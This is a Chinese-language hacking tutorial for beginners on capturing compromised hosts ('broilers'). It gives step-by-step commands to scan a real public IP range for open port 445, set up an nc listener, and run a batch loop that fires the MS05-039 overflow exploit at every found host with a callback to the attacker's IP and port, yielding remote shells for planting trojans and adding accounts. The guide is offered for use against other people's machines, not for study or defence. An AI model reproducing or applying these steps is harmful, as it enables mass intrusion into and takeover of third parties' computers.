肉鸡是黑客新手成长的一个练手平台,但是对于刚接触黑客的新手来说,要想抓取肉鸡并非容易,一般他们都是通过找师傅给肉鸡的途径才能获取。那么难道黑客新手,真的只能通过师傅施舍肉鸡来获取吗?答案当然不是,以下笔者针对初级黑客量身订做了一套抓取肉鸡的方法,具体操作请看下文所示。
俗话说的好:“工欲善其事,必先利其器”,首先我们在操作之前,需要从网上下载s.exe扫描器和nc瑞士军刀监听、Ms05039漏洞溢出工具,然后在命令行下,将默认目录跳转到下载的s.exe扫描器目录处。
由于我们不知道哪台主机存在Ms05039漏洞,所以这里从中输入s tcp 218.1.0.0 218.1.128.255 445(端口) 120(线程,可以根据网络好坏调整大小) /save命令回车,便可对其218.1.0.0--218.1.128.255段的主机进行扫描,如果你想扫描其他主机段,只要将其IP段进行替换,其他保持原样即可。稍等片刻后,扫描结果会生成在S扫描器目录下的Result.txt内(图69)。
图69 扫描结果显示
小提示:以上命令参数Tcp,为本次扫描的方式是Tcp形式。而后其面的218.1.0.0 218.1.128.255为扫描的IP段,445为扫描端口,120为线程这个可以根据自己实际网速来定。
接下来打开“CMD命令”对话框,如果此时的目录并非Nc工具所在的目录,请将其默认目录跳转到NC工具目录下。然后从中输入“nc -l -vv –p 想要监听的端口”命令回车,对其本地某端口执行监听。当然你也可以像笔者一样,在一个Bat的批处理文件中,输入监听命令,然后执行其Bat批处理文件,同样可以达到监听本机端口的效果(图70)。
图70 利用Nc瑞士军刀对本机1984端口进行监听
执行完以上监听后,为了方便自己的溢出,笔者在存有S扫描工具、Ms05039漏洞目录内,新建了一个记事本文档,然后在其文档内部,输入如下溢出命令:@for /f %%i in (result.txt) do ms05039 %%i 219.128.81.93 1984,接着将其保存为.Bat形式的批处理文件即可。操作完毕后,另外打开一个“CMD命令”窗口,从中运行其批处理文件,此时就可对其所扫到445主机,进行批量溢出,从而得到Shell,自行做上传木马、建立用户等任意操作(图71)。
图71 自动对result.txt文本内的主机进行批量溢出
小提示:result.txt是我们之前所扫描到可用漏洞的主机群体,219.128.81.93则是自己的IP地址,1984是本机所监听的端口号。 |
